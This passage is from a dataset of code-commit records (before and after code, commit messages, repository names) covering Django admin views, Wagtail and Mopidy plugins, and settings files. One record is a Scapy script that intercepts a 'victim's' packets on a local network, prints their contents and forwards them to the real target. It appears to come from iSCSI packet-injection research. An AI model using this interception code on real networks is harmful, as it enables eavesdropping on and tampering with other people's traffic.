class SubjectListView(PermissionRequiredMixin, ListView):
model = Subject
permission_required = 'osf.view_subject'
paginate_by = 100
raise_exception = True
def get_queryset(self):
req_obj = self.request.GET
qs = super(SubjectListView, self).get_queryset().order_by('text')
if PreprintProvider.objects.filter(_id=req_obj.get('provider_id')).exists():
qs = qs.filter(provider___id=req_obj.get('provider_id'))
return qs
def get_context_data(self, **kwargs):
context = super(SubjectListView, self).get_context_data(**kwargs)
context['filterable_provider_ids'] = dict({'': '---'}, **dict(PreprintProvider.objects.values_list('_id', 'name')))
return context
class SubjectUpdateView(PermissionRequiredMixin, UpdateView):
form_class = SubjectForm
model = SubjectForm.Meta.model
permission_required = 'osf.change_subject'
raise_exception = True
def get_success_url(self, *args, **kwargs):
return reverse_lazy('subjects:list')
| <commit_before>from django.contrib.auth.mixins import PermissionRequiredMixin
from django.core.urlresolvers import reverse_lazy
from django.views.generic import ListView, UpdateView
from admin.subjects.forms import SubjectForm
from osf.models.subject import Subject
from osf.models.preprint_provider import PreprintProvider
class SubjectListView(PermissionRequiredMixin, ListView):
model = Subject
permission_required = 'osf.view_subject'
paginate_by = 100
raise_exception = True
def get_queryset(self):
req_obj = self.request.GET
qs = super(SubjectListView, self).get_queryset().order_by('text')
if PreprintProvider.objects.filter(_id=req_obj.get('provider_id')).exists():
qs = qs.filter(provider___id=req_obj.get('provider_id'))
return qs
def get_context_data(self, **kwargs):
context = super(SubjectListView, self).get_context_data(**kwargs)
context['filterable_provider_ids'] = dict({'': '---'}, **dict(PreprintProvider.objects.values_list('_id', 'name')))
return context
class SubjectUpdateView(PermissionRequiredMixin, UpdateView):
form_class = SubjectForm
model = SubjectForm.Meta.model
permission_required = 'osf.edit_subject'
raise_exception = True
def get_success_url(self, *args, **kwargs):
return reverse_lazy('subjects:list')
<commit_msg>Change permission to correct codename of change_subject<commit_after> | from django.contrib.auth.mixins import PermissionRequiredMixin
from django.core.urlresolvers import reverse_lazy
from django.views.generic import ListView, UpdateView
from admin.subjects.forms import SubjectForm
from osf.models.subject import Subject
from osf.models.preprint_provider import PreprintProvider
class SubjectListView(PermissionRequiredMixin, ListView):
model = Subject
permission_required = 'osf.view_subject'
paginate_by = 100
raise_exception = True
def get_queryset(self):
req_obj = self.request.GET
qs = super(SubjectListView, self).get_queryset().order_by('text')
if PreprintProvider.objects.filter(_id=req_obj.get('provider_id')).exists():
qs = qs.filter(provider___id=req_obj.get('provider_id'))
return qs
def get_context_data(self, **kwargs):
context = super(SubjectListView, self).get_context_data(**kwargs)
context['filterable_provider_ids'] = dict({'': '---'}, **dict(PreprintProvider.objects.values_list('_id', 'name')))
return context
class SubjectUpdateView(PermissionRequiredMixin, UpdateView):
form_class = SubjectForm
model = SubjectForm.Meta.model
permission_required = 'osf.change_subject'
raise_exception = True
def get_success_url(self, *args, **kwargs):
return reverse_lazy('subjects:list')
| from django.contrib.auth.mixins import PermissionRequiredMixin
from django.core.urlresolvers import reverse_lazy
from django.views.generic import ListView, UpdateView
from admin.subjects.forms import SubjectForm
from osf.models.subject import Subject
from osf.models.preprint_provider import PreprintProvider
class SubjectListView(PermissionRequiredMixin, ListView):
model = Subject
permission_required = 'osf.view_subject'
paginate_by = 100
raise_exception = True
def get_queryset(self):
req_obj = self.request.GET
qs = super(SubjectListView, self).get_queryset().order_by('text')
if PreprintProvider.objects.filter(_id=req_obj.get('provider_id')).exists():
qs = qs.filter(provider___id=req_obj.get('provider_id'))
return qs
def get_context_data(self, **kwargs):
context = super(SubjectListView, self).get_context_data(**kwargs)
context['filterable_provider_ids'] = dict({'': '---'}, **dict(PreprintProvider.objects.values_list('_id', 'name')))
return context
class SubjectUpdateView(PermissionRequiredMixin, UpdateView):
form_class = SubjectForm
model = SubjectForm.Meta.model
permission_required = 'osf.edit_subject'
raise_exception = True
def get_success_url(self, *args, **kwargs):
return reverse_lazy('subjects:list')
Change permission to correct codename of change_subjectfrom django.contrib.auth.mixins import PermissionRequiredMixin
from django.core.urlresolvers import reverse_lazy
from django.views.generic import ListView, UpdateView
from admin.subjects.forms import SubjectForm
from osf.models.subject import Subject
from osf.models.preprint_provider import PreprintProvider
class SubjectListView(PermissionRequiredMixin, ListView):
model = Subject
permission_required = 'osf.view_subject'
paginate_by = 100
raise_exception = True
def get_queryset(self):
req_obj = self.request.GET
qs = super(SubjectListView, self).get_queryset().order_by('text')
if PreprintProvider.objects.filter(_id=req_obj.get('provider_id')).exists():
qs = qs.filter(provider___id=req_obj.get('provider_id'))
return qs
def get_context_data(self, **kwargs):
context = super(SubjectListView, self).get_context_data(**kwargs)
context['filterable_provider_ids'] = dict({'': '---'}, **dict(PreprintProvider.objects.values_list('_id', 'name')))
return context
class SubjectUpdateView(PermissionRequiredMixin, UpdateView):
form_class = SubjectForm
model = SubjectForm.Meta.model
permission_required = 'osf.change_subject'
raise_exception = True
def get_success_url(self, *args, **kwargs):
return reverse_lazy('subjects:list')
| <commit_before>from django.contrib.auth.mixins import PermissionRequiredMixin
from django.core.urlresolvers import reverse_lazy
from django.views.generic import ListView, UpdateView
from admin.subjects.forms import SubjectForm
from osf.models.subject import Subject
from osf.models.preprint_provider import PreprintProvider
class SubjectListView(PermissionRequiredMixin, ListView):
model = Subject
permission_required = 'osf.view_subject'
paginate_by = 100
raise_exception = True
def get_queryset(self):
req_obj = self.request.GET
qs = super(SubjectListView, self).get_queryset().order_by('text')
if PreprintProvider.objects.filter(_id=req_obj.get('provider_id')).exists():
qs = qs.filter(provider___id=req_obj.get('provider_id'))
return qs
def get_context_data(self, **kwargs):
context = super(SubjectListView, self).get_context_data(**kwargs)
context['filterable_provider_ids'] = dict({'': '---'}, **dict(PreprintProvider.objects.values_list('_id', 'name')))
return context
class SubjectUpdateView(PermissionRequiredMixin, UpdateView):
form_class = SubjectForm
model = SubjectForm.Meta.model
permission_required = 'osf.edit_subject'
raise_exception = True
def get_success_url(self, *args, **kwargs):
return reverse_lazy('subjects:list')
<commit_msg>Change permission to correct codename of change_subject<commit_after>from django.contrib.auth.mixins import PermissionRequiredMixin
from django.core.urlresolvers import reverse_lazy
from django.views.generic import ListView, UpdateView
from admin.subjects.forms import SubjectForm
from osf.models.subject import Subject
from osf.models.preprint_provider import PreprintProvider
class SubjectListView(PermissionRequiredMixin, ListView):
model = Subject
permission_required = 'osf.view_subject'
paginate_by = 100
raise_exception = True
def get_queryset(self):
req_obj = self.request.GET
qs = super(SubjectListView, self).get_queryset().order_by('text')
if PreprintProvider.objects.filter(_id=req_obj.get('provider_id')).exists():
qs = qs.filter(provider___id=req_obj.get('provider_id'))
return qs
def get_context_data(self, **kwargs):
context = super(SubjectListView, self).get_context_data(**kwargs)
context['filterable_provider_ids'] = dict({'': '---'}, **dict(PreprintProvider.objects.values_list('_id', 'name')))
return context
class SubjectUpdateView(PermissionRequiredMixin, UpdateView):
form_class = SubjectForm
model = SubjectForm.Meta.model
permission_required = 'osf.change_subject'
raise_exception = True
def get_success_url(self, *args, **kwargs):
return reverse_lazy('subjects:list')
|
d0651d590f558f69f2c09230daf59336ac3f6406 | molo/core/api/constants.py | molo/core/api/constants.py | from collections import namedtuple
CONTENT_TYPES = [
("core.ArticlePage", "Article"),
("core.SectionPage", "Section"),
]
ENDPOINTS = [
("page", "api/v1/pages")
]
SESSION_VARS = namedtuple(
"SESSION_VARS",
["first", "second", ]
)
ARTICLE_SESSION_VARS = SESSION_VARS(
first=("url", "content_type"),
second="parent_page_id"
)
API_PAGES_ENDPOINT = "/api/v2/pages/"
API_IMAGES_ENDPOINT = "/api/v2/images/"
| from collections import namedtuple
CONTENT_TYPES = [
("core.ArticlePage", "Article"),
("core.SectionPage", "Section"),
]
ENDPOINTS = [
("page", "api/v1/pages")
]
SESSION_VARS = namedtuple(
"SESSION_VARS",
["first", "second", ]
)
ARTICLE_SESSION_VARS = SESSION_VARS(
first=("url", "article_content_type"),
second="article_parent_page_id"
)
API_PAGES_ENDPOINT = "/api/v2/pages/"
API_IMAGES_ENDPOINT = "/api/v2/images/"
| Change article session variable names | Change article session variable names
| Python | bsd-2-clause | praekelt/molo,praekelt/molo,praekelt/molo,praekelt/molo | from collections import namedtuple
CONTENT_TYPES = [
("core.ArticlePage", "Article"),
("core.SectionPage", "Section"),
]
ENDPOINTS = [
("page", "api/v1/pages")
]
SESSION_VARS = namedtuple(
"SESSION_VARS",
["first", "second", ]
)
ARTICLE_SESSION_VARS = SESSION_VARS(
first=("url", "content_type"),
second="parent_page_id"
)
API_PAGES_ENDPOINT = "/api/v2/pages/"
API_IMAGES_ENDPOINT = "/api/v2/images/"
Change article session variable names | from collections import namedtuple
CONTENT_TYPES = [
("core.ArticlePage", "Article"),
("core.SectionPage", "Section"),
]
ENDPOINTS = [
("page", "api/v1/pages")
]
SESSION_VARS = namedtuple(
"SESSION_VARS",
["first", "second", ]
)
ARTICLE_SESSION_VARS = SESSION_VARS(
first=("url", "article_content_type"),
second="article_parent_page_id"
)
API_PAGES_ENDPOINT = "/api/v2/pages/"
API_IMAGES_ENDPOINT = "/api/v2/images/"
| <commit_before>from collections import namedtuple
CONTENT_TYPES = [
("core.ArticlePage", "Article"),
("core.SectionPage", "Section"),
]
ENDPOINTS = [
("page", "api/v1/pages")
]
SESSION_VARS = namedtuple(
"SESSION_VARS",
["first", "second", ]
)
ARTICLE_SESSION_VARS = SESSION_VARS(
first=("url", "content_type"),
second="parent_page_id"
)
API_PAGES_ENDPOINT = "/api/v2/pages/"
API_IMAGES_ENDPOINT = "/api/v2/images/"
<commit_msg>Change article session variable names<commit_after> | from collections import namedtuple
CONTENT_TYPES = [
("core.ArticlePage", "Article"),
("core.SectionPage", "Section"),
]
ENDPOINTS = [
("page", "api/v1/pages")
]
SESSION_VARS = namedtuple(
"SESSION_VARS",
["first", "second", ]
)
ARTICLE_SESSION_VARS = SESSION_VARS(
first=("url", "article_content_type"),
second="article_parent_page_id"
)
API_PAGES_ENDPOINT = "/api/v2/pages/"
API_IMAGES_ENDPOINT = "/api/v2/images/"
| from collections import namedtuple
CONTENT_TYPES = [
("core.ArticlePage", "Article"),
("core.SectionPage", "Section"),
]
ENDPOINTS = [
("page", "api/v1/pages")
]
SESSION_VARS = namedtuple(
"SESSION_VARS",
["first", "second", ]
)
ARTICLE_SESSION_VARS = SESSION_VARS(
first=("url", "content_type"),
second="parent_page_id"
)
API_PAGES_ENDPOINT = "/api/v2/pages/"
API_IMAGES_ENDPOINT = "/api/v2/images/"
Change article session variable namesfrom collections import namedtuple
CONTENT_TYPES = [
("core.ArticlePage", "Article"),
("core.SectionPage", "Section"),
]
ENDPOINTS = [
("page", "api/v1/pages")
]
SESSION_VARS = namedtuple(
"SESSION_VARS",
["first", "second", ]
)
ARTICLE_SESSION_VARS = SESSION_VARS(
first=("url", "article_content_type"),
second="article_parent_page_id"
)
API_PAGES_ENDPOINT = "/api/v2/pages/"
API_IMAGES_ENDPOINT = "/api/v2/images/"
| <commit_before>from collections import namedtuple
CONTENT_TYPES = [
("core.ArticlePage", "Article"),
("core.SectionPage", "Section"),
]
ENDPOINTS = [
("page", "api/v1/pages")
]
SESSION_VARS = namedtuple(
"SESSION_VARS",
["first", "second", ]
)
ARTICLE_SESSION_VARS = SESSION_VARS(
first=("url", "content_type"),
second="parent_page_id"
)
API_PAGES_ENDPOINT = "/api/v2/pages/"
API_IMAGES_ENDPOINT = "/api/v2/images/"
<commit_msg>Change article session variable names<commit_after>from collections import namedtuple
CONTENT_TYPES = [
("core.ArticlePage", "Article"),
("core.SectionPage", "Section"),
]
ENDPOINTS = [
("page", "api/v1/pages")
]
SESSION_VARS = namedtuple(
"SESSION_VARS",
["first", "second", ]
)
ARTICLE_SESSION_VARS = SESSION_VARS(
first=("url", "article_content_type"),
second="article_parent_page_id"
)
API_PAGES_ENDPOINT = "/api/v2/pages/"
API_IMAGES_ENDPOINT = "/api/v2/images/"
|
818023e8bdfe607efe9c31bfd70487b0195c4861 | Scapy/ip_forward.py | Scapy/ip_forward.py | #!/etc/usr/python
from scapy.all import *
import sys
iface = "eth0"
filter = "ip"
#victim in this case is the initiator
VICTIM_IP = "192.168.1.121"
MY_IP = "192.168.1.154"
# gateway is the target
GATEWAY_IP = "192.168.1.171"
#VICTIM_MAC = "### don't want so show###"
MY_MAC = "08:00:27:7B:80:18"
#target mac address
GATEWAY_MAC = "08:00:27:24:08:34"
def handle_packet(packet):
if (packet[IP].dst == GATEWAY_IP) and (packet[Ether].dst == MY_MAC):
# we change the packet destination to the target machine
packet[Ether].dst = GATEWAY_MAC
# TODO: block iscsi packets with an if condition
sendp(packet)
print "A packet from " + packet[IP].src + " redirected!"
#printing redirected packets load
sprintf("{Raw:%Raw.load%\n}")
sniff(prn=handle_packet, filter=filter, iface=iface, store=0)
| #!/etc/usr/python
from scapy.all import *
import sys
iface = "eth0"
filter = "ip"
#victim in this case is the initiator
VICTIM_IP = "192.168.1.121"
MY_IP = "192.168.1.154"
# gateway is the target
GATEWAY_IP = "192.168.1.171"
#VICTIM_MAC = "### don't want so show###"
MY_MAC = "08:00:27:7b:80:18"
#target mac address
GATEWAY_MAC = "08:00:27:24:08:34"
def handle_packet(packet):
if (packet[IP].dst == GATEWAY_IP) and (packet[Ether].dst == MY_MAC):
# we change the packet destination to the target machine
packet[Ether].dst = GATEWAY_MAC
# TODO: block iscsi packets with an if condition
if(packet[TCP]):
# sprintf("{Raw:%Raw.load%\n}")
print str(packet) + "\n"
sendp(packet)
print "A packet from " + packet[IP].src + " redirected!"
#printing redirected packets load
#sprintf("{Raw:%Raw.load%\n}")
sniff(prn=handle_packet, filter=filter, iface=iface, store=0)
| Add ip forwarding and packet by packet sniffing code. | Add ip forwarding and packet by packet sniffing code.
| Python | mit | illinoistech-itm/pykkon,illinoistech-itm/pykkon,Illinois-tech-ITM/BSMP-2016-ISCSI-Packet-Injection,Illinois-tech-ITM/BSMP-2016-ISCSI-Packet-Injection,illinoistech-itm/pykkon,Illinois-tech-ITM/BSMP-2016-ISCSI-Packet-Injection | #!/etc/usr/python
from scapy.all import *
import sys
iface = "eth0"
filter = "ip"
#victim in this case is the initiator
VICTIM_IP = "192.168.1.121"
MY_IP = "192.168.1.154"
# gateway is the target
GATEWAY_IP = "192.168.1.171"
#VICTIM_MAC = "### don't want so show###"
MY_MAC = "08:00:27:7B:80:18"
#target mac address
GATEWAY_MAC = "08:00:27:24:08:34"
def handle_packet(packet):
if (packet[IP].dst == GATEWAY_IP) and (packet[Ether].dst == MY_MAC):
# we change the packet destination to the target machine
packet[Ether].dst = GATEWAY_MAC
# TODO: block iscsi packets with an if condition
sendp(packet)
print "A packet from " + packet[IP].src + " redirected!"
#printing redirected packets load
sprintf("{Raw:%Raw.load%\n}")
sniff(prn=handle_packet, filter=filter, iface=iface, store=0)
Add ip forwarding and packet by packet sniffing code. | #!/etc/usr/python
from scapy.all import *
import sys
iface = "eth0"
filter = "ip"
#victim in this case is the initiator
VICTIM_IP = "192.168.1.121"
MY_IP = "192.168.1.154"
# gateway is the target
GATEWAY_IP = "192.168.1.171"
#VICTIM_MAC = "### don't want so show###"
MY_MAC = "08:00:27:7b:80:18"
#target mac address
GATEWAY_MAC = "08:00:27:24:08:34"
def handle_packet(packet):
if (packet[IP].dst == GATEWAY_IP) and (packet[Ether].dst == MY_MAC):
# we change the packet destination to the target machine
packet[Ether].dst = GATEWAY_MAC
# TODO: block iscsi packets with an if condition
if(packet[TCP]):
# sprintf("{Raw:%Raw.load%\n}")
print str(packet) + "\n"
sendp(packet)
print "A packet from " + packet[IP].src + " redirected!"
#printing redirected packets load
#sprintf("{Raw:%Raw.load%\n}")
sniff(prn=handle_packet, filter=filter, iface=iface, store=0)
| <commit_before>#!/etc/usr/python
from scapy.all import *
import sys
iface = "eth0"
filter = "ip"
#victim in this case is the initiator
VICTIM_IP = "192.168.1.121"
MY_IP = "192.168.1.154"
# gateway is the target
GATEWAY_IP = "192.168.1.171"
#VICTIM_MAC = "### don't want so show###"
MY_MAC = "08:00:27:7B:80:18"
#target mac address
GATEWAY_MAC = "08:00:27:24:08:34"
def handle_packet(packet):
if (packet[IP].dst == GATEWAY_IP) and (packet[Ether].dst == MY_MAC):
# we change the packet destination to the target machine
packet[Ether].dst = GATEWAY_MAC
# TODO: block iscsi packets with an if condition
sendp(packet)
print "A packet from " + packet[IP].src + " redirected!"
#printing redirected packets load
sprintf("{Raw:%Raw.load%\n}")
sniff(prn=handle_packet, filter=filter, iface=iface, store=0)
<commit_msg>Add ip forwarding and packet by packet sniffing code.<commit_after> | #!/etc/usr/python
from scapy.all import *
import sys
iface = "eth0"
filter = "ip"
#victim in this case is the initiator
VICTIM_IP = "192.168.1.121"
MY_IP = "192.168.1.154"
# gateway is the target
GATEWAY_IP = "192.168.1.171"
#VICTIM_MAC = "### don't want so show###"
MY_MAC = "08:00:27:7b:80:18"
#target mac address
GATEWAY_MAC = "08:00:27:24:08:34"
def handle_packet(packet):
if (packet[IP].dst == GATEWAY_IP) and (packet[Ether].dst == MY_MAC):
# we change the packet destination to the target machine
packet[Ether].dst = GATEWAY_MAC
# TODO: block iscsi packets with an if condition
if(packet[TCP]):
# sprintf("{Raw:%Raw.load%\n}")
print str(packet) + "\n"
sendp(packet)
print "A packet from " + packet[IP].src + " redirected!"
#printing redirected packets load
#sprintf("{Raw:%Raw.load%\n}")
sniff(prn=handle_packet, filter=filter, iface=iface, store=0)
| #!/etc/usr/python
from scapy.all import *
import sys
iface = "eth0"
filter = "ip"
#victim in this case is the initiator
VICTIM_IP = "192.168.1.121"
MY_IP = "192.168.1.154"
# gateway is the target
GATEWAY_IP = "192.168.1.171"
#VICTIM_MAC = "### don't want so show###"
MY_MAC = "08:00:27:7B:80:18"
#target mac address
GATEWAY_MAC = "08:00:27:24:08:34"
def handle_packet(packet):
if (packet[IP].dst == GATEWAY_IP) and (packet[Ether].dst == MY_MAC):
# we change the packet destination to the target machine
packet[Ether].dst = GATEWAY_MAC
# TODO: block iscsi packets with an if condition
sendp(packet)
print "A packet from " + packet[IP].src + " redirected!"
#printing redirected packets load
sprintf("{Raw:%Raw.load%\n}")
sniff(prn=handle_packet, filter=filter, iface=iface, store=0)
Add ip forwarding and packet by packet sniffing code.#!/etc/usr/python
from scapy.all import *
import sys
iface = "eth0"
filter = "ip"
#victim in this case is the initiator
VICTIM_IP = "192.168.1.121"
MY_IP = "192.168.1.154"
# gateway is the target
GATEWAY_IP = "192.168.1.171"
#VICTIM_MAC = "### don't want so show###"
MY_MAC = "08:00:27:7b:80:18"
#target mac address
GATEWAY_MAC = "08:00:27:24:08:34"
def handle_packet(packet):
if (packet[IP].dst == GATEWAY_IP) and (packet[Ether].dst == MY_MAC):
# we change the packet destination to the target machine
packet[Ether].dst = GATEWAY_MAC
# TODO: block iscsi packets with an if condition
if(packet[TCP]):
# sprintf("{Raw:%Raw.load%\n}")
print str(packet) + "\n"
sendp(packet)
print "A packet from " + packet[IP].src + " redirected!"
#printing redirected packets load
#sprintf("{Raw:%Raw.load%\n}")
sniff(prn=handle_packet, filter=filter, iface=iface, store=0)
| <commit_before>#!/etc/usr/python
from scapy.all import *
import sys
iface = "eth0"
filter = "ip"
#victim in this case is the initiator
VICTIM_IP = "192.168.1.121"
MY_IP = "192.168.1.154"
# gateway is the target
GATEWAY_IP = "192.168.1.171"
#VICTIM_MAC = "### don't want so show###"
MY_MAC = "08:00:27:7B:80:18"
#target mac address
GATEWAY_MAC = "08:00:27:24:08:34"
def handle_packet(packet):
if (packet[IP].dst == GATEWAY_IP) and (packet[Ether].dst == MY_MAC):
# we change the packet destination to the target machine
packet[Ether].dst = GATEWAY_MAC
# TODO: block iscsi packets with an if condition
sendp(packet)
print "A packet from " + packet[IP].src + " redirected!"
#printing redirected packets load
sprintf("{Raw:%Raw.load%\n}")
sniff(prn=handle_packet, filter=filter, iface=iface, store=0)
<commit_msg>Add ip forwarding and packet by packet sniffing code.<commit_after>#!/etc/usr/python
from scapy.all import *
import sys
iface = "eth0"
filter = "ip"
#victim in this case is the initiator
VICTIM_IP = "192.168.1.121"
MY_IP = "192.168.1.154"
# gateway is the target
GATEWAY_IP = "192.168.1.171"
#VICTIM_MAC = "### don't want so show###"
MY_MAC = "08:00:27:7b:80:18"
#target mac address
GATEWAY_MAC = "08:00:27:24:08:34"
def handle_packet(packet):
if (packet[IP].dst == GATEWAY_IP) and (packet[Ether].dst == MY_MAC):
# we change the packet destination to the target machine
packet[Ether].dst = GATEWAY_MAC
# TODO: block iscsi packets with an if condition
if(packet[TCP]):
# sprintf("{Raw:%Raw.load%\n}")
print str(packet) + "\n"
sendp(packet)
print "A packet from " + packet[IP].src + " redirected!"
#printing redirected packets load
#sprintf("{Raw:%Raw.load%\n}")
sniff(prn=handle_packet, filter=filter, iface=iface, store=0)
|
a65d65ce536a0a6dbc01f7f31db4bbabd08ec223 | project_template/project_settings.py | project_template/project_settings.py | # Do not commit secrets to VCS.
# Local environment variables will be loaded from `.env.local`.
# Additional environment variables will be loaded from `.env.$DOTENV`.
# Local settings will be imported from `project_settings_local.py`
from icekit.project.settings.glamkit import * # glamkit, icekit
# Override the default ICEkit settings to form project settings.
| # Do not commit secrets to VCS.
# Local environment variables will be loaded from `.env.local`.
# Additional environment variables will be loaded from `.env.$DOTENV`.
# Local settings will be imported from `project_settings_local.py`
from icekit.project.settings.icekit import * # glamkit, icekit
# Override the default ICEkit settings to form project settings.
| Use ICEkit settings by default again. | Use ICEkit settings by default again.
| Python | mit | ic-labs/django-icekit,ic-labs/django-icekit,ic-labs/django-icekit,ic-labs/django-icekit | # Do not commit secrets to VCS.
# Local environment variables will be loaded from `.env.local`.
# Additional environment variables will be loaded from `.env.$DOTENV`.
# Local settings will be imported from `project_settings_local.py`
from icekit.project.settings.glamkit import * # glamkit, icekit
# Override the default ICEkit settings to form project settings.
Use ICEkit settings by default again. | # Do not commit secrets to VCS.
# Local environment variables will be loaded from `.env.local`.
# Additional environment variables will be loaded from `.env.$DOTENV`.
# Local settings will be imported from `project_settings_local.py`
from icekit.project.settings.icekit import * # glamkit, icekit
# Override the default ICEkit settings to form project settings.
| <commit_before># Do not commit secrets to VCS.
# Local environment variables will be loaded from `.env.local`.
# Additional environment variables will be loaded from `.env.$DOTENV`.
# Local settings will be imported from `project_settings_local.py`
from icekit.project.settings.glamkit import * # glamkit, icekit
# Override the default ICEkit settings to form project settings.
<commit_msg>Use ICEkit settings by default again.<commit_after> | # Do not commit secrets to VCS.
# Local environment variables will be loaded from `.env.local`.
# Additional environment variables will be loaded from `.env.$DOTENV`.
# Local settings will be imported from `project_settings_local.py`
from icekit.project.settings.icekit import * # glamkit, icekit
# Override the default ICEkit settings to form project settings.
| # Do not commit secrets to VCS.
# Local environment variables will be loaded from `.env.local`.
# Additional environment variables will be loaded from `.env.$DOTENV`.
# Local settings will be imported from `project_settings_local.py`
from icekit.project.settings.glamkit import * # glamkit, icekit
# Override the default ICEkit settings to form project settings.
Use ICEkit settings by default again.# Do not commit secrets to VCS.
# Local environment variables will be loaded from `.env.local`.
# Additional environment variables will be loaded from `.env.$DOTENV`.
# Local settings will be imported from `project_settings_local.py`
from icekit.project.settings.icekit import * # glamkit, icekit
# Override the default ICEkit settings to form project settings.
| <commit_before># Do not commit secrets to VCS.
# Local environment variables will be loaded from `.env.local`.
# Additional environment variables will be loaded from `.env.$DOTENV`.
# Local settings will be imported from `project_settings_local.py`
from icekit.project.settings.glamkit import * # glamkit, icekit
# Override the default ICEkit settings to form project settings.
<commit_msg>Use ICEkit settings by default again.<commit_after># Do not commit secrets to VCS.
# Local environment variables will be loaded from `.env.local`.
# Additional environment variables will be loaded from `.env.$DOTENV`.
# Local settings will be imported from `project_settings_local.py`
from icekit.project.settings.icekit import * # glamkit, icekit
# Override the default ICEkit settings to form project settings.
|
46f3067650001454ed99351cc5569813a378dcec | mopidy_jukebox/frontend.py | mopidy_jukebox/frontend.py | import pykka
from mopidy import core
class JukeboxFrontend(pykka.ThreadingActor, core.CoreListener):
def __init__(self, config, core):
super(JukeboxFrontend, self).__init__()
self.core = core
def track_playback_ended(self, tl_track, time_position):
# Remove old votes
pass
def track_playback_started(self, tl_track):
pass
| import pykka
from mopidy import core
from models import Vote
class JukeboxFrontend(pykka.ThreadingActor, core.CoreListener):
def __init__(self, config, core):
super(JukeboxFrontend, self).__init__()
self.core = core
core.tracklist.set_consume(True)
def track_playback_ended(self, tl_track, time_position):
# Remove old votes
Vote.delete().where(Vote.track_uri == tl_track.track.uri).execute()
def track_playback_started(self, tl_track):
pass
| Delete votes when track is over. | Delete votes when track is over.
| Python | mit | qurben/mopidy-jukebox,qurben/mopidy-jukebox,qurben/mopidy-jukebox | import pykka
from mopidy import core
class JukeboxFrontend(pykka.ThreadingActor, core.CoreListener):
def __init__(self, config, core):
super(JukeboxFrontend, self).__init__()
self.core = core
def track_playback_ended(self, tl_track, time_position):
# Remove old votes
pass
def track_playback_started(self, tl_track):
pass
Delete votes when track is over. | import pykka
from mopidy import core
from models import Vote
class JukeboxFrontend(pykka.ThreadingActor, core.CoreListener):
def __init__(self, config, core):
super(JukeboxFrontend, self).__init__()
self.core = core
core.tracklist.set_consume(True)
def track_playback_ended(self, tl_track, time_position):
# Remove old votes
Vote.delete().where(Vote.track_uri == tl_track.track.uri).execute()
def track_playback_started(self, tl_track):
pass
| <commit_before>import pykka
from mopidy import core
class JukeboxFrontend(pykka.ThreadingActor, core.CoreListener):
def __init__(self, config, core):
super(JukeboxFrontend, self).__init__()
self.core = core
def track_playback_ended(self, tl_track, time_position):
# Remove old votes
pass
def track_playback_started(self, tl_track):
pass
<commit_msg>Delete votes when track is over.<commit_after> | import pykka
from mopidy import core
from models import Vote
class JukeboxFrontend(pykka.ThreadingActor, core.CoreListener):
def __init__(self, config, core):
super(JukeboxFrontend, self).__init__()
self.core = core
core.tracklist.set_consume(True)
def track_playback_ended(self, tl_track, time_position):
# Remove old votes
Vote.delete().where(Vote.track_uri == tl_track.track.uri).execute()
def track_playback_started(self, tl_track):
pass
| import pykka
from mopidy import core
class JukeboxFrontend(pykka.ThreadingActor, core.CoreListener):
def __init__(self, config, core):
super(JukeboxFrontend, self).__init__()
self.core = core
def track_playback_ended(self, tl_track, time_position):
# Remove old votes
pass
def track_playback_started(self, tl_track):
pass
Delete votes when track is over.import pykka
from mopidy import core
from models import Vote
class JukeboxFrontend(pykka.ThreadingActor, core.CoreListener):
def __init__(self, config, core):
super(JukeboxFrontend, self).__init__()
self.core = core
core.tracklist.set_consume(True)
def track_playback_ended(self, tl_track, time_position):
# Remove old votes
Vote.delete().where(Vote.track_uri == tl_track.track.uri).execute()
def track_playback_started(self, tl_track):
pass
| <commit_before>import pykka
from mopidy import core
class JukeboxFrontend(pykka.ThreadingActor, core.CoreListener):
def __init__(self, config, core):
super(JukeboxFrontend, self).__init__()
self.core = core
def track_playback_ended(self, tl_track, time_position):
# Remove old votes
pass
def track_playback_started(self, tl_track):
pass
<commit_msg>Delete votes when track is over.<commit_after>import pykka
from mopidy import core
from models import Vote
class JukeboxFrontend(pykka.ThreadingActor, core.CoreListener):
def __init__(self, config, core):
super(JukeboxFrontend, self).__init__()
self.core = core
core.tracklist.set_consume(True)
def track_playback_ended(self, tl_track, time_position):
# Remove old votes
Vote.delete().where(Vote.track_uri == tl_track.track.uri).execute()
def track_playback_started(self, tl_track):
pass
|
afb1f8ed42c9b4f909f857cd960b526a0a31a901 | src/librement/debug/urls.py | src/librement/debug/urls.py | from django.conf.urls.defaults import patterns, url, include
from django.conf import settings
urlpatterns = patterns('librement.debug.views',
)
if settings.DEBUG:
urlpatterns += patterns('django.views.static',
url(r'^media/(?P<path>.*)$', 'serve',
{'document_root': settings.STATIC_MEDIA_ROOT}),
(r'^(?P<path>favicon\.ico|robots\.txt)$', 'serve',
{'document_root': settings.STATIC_MEDIA_ROOT}),
)
urlpatterns += patterns('librement.debug.views',
url(r'^(?P<code>404|500)$', 'error'),
)
| from django.conf.urls.defaults import patterns, url, include
from django.conf import settings
urlpatterns = patterns('librement.debug.views',
)
if settings.DEBUG:
urlpatterns += patterns('django.views.static',
url(r'^media/(?P<path>.*)$', 'serve',
{'document_root': settings.STATIC_MEDIA_ROOT}),
(r'^(?P<path>favicon\.ico|robots\.txt)$', 'serve',
{'document_root': settings.STATIC_MEDIA_ROOT}),
)
urlpatterns += patterns('librement.debug.views',
url(r'^(?P<code>404|500)$', 'error'),
)
urlpatterns += patterns('',
url(r'', include('debug_toolbar_user_panel.urls')),
)
| Enable the user panel properly. | Enable the user panel properly.
Signed-off-by: Chris Lamb <29e6d179a8d73471df7861382db6dd7e64138033@debian.org>
| Python | agpl-3.0 | rhertzog/librement,rhertzog/librement,rhertzog/librement | from django.conf.urls.defaults import patterns, url, include
from django.conf import settings
urlpatterns = patterns('librement.debug.views',
)
if settings.DEBUG:
urlpatterns += patterns('django.views.static',
url(r'^media/(?P<path>.*)$', 'serve',
{'document_root': settings.STATIC_MEDIA_ROOT}),
(r'^(?P<path>favicon\.ico|robots\.txt)$', 'serve',
{'document_root': settings.STATIC_MEDIA_ROOT}),
)
urlpatterns += patterns('librement.debug.views',
url(r'^(?P<code>404|500)$', 'error'),
)
Enable the user panel properly.
Signed-off-by: Chris Lamb <29e6d179a8d73471df7861382db6dd7e64138033@debian.org> | from django.conf.urls.defaults import patterns, url, include
from django.conf import settings
urlpatterns = patterns('librement.debug.views',
)
if settings.DEBUG:
urlpatterns += patterns('django.views.static',
url(r'^media/(?P<path>.*)$', 'serve',
{'document_root': settings.STATIC_MEDIA_ROOT}),
(r'^(?P<path>favicon\.ico|robots\.txt)$', 'serve',
{'document_root': settings.STATIC_MEDIA_ROOT}),
)
urlpatterns += patterns('librement.debug.views',
url(r'^(?P<code>404|500)$', 'error'),
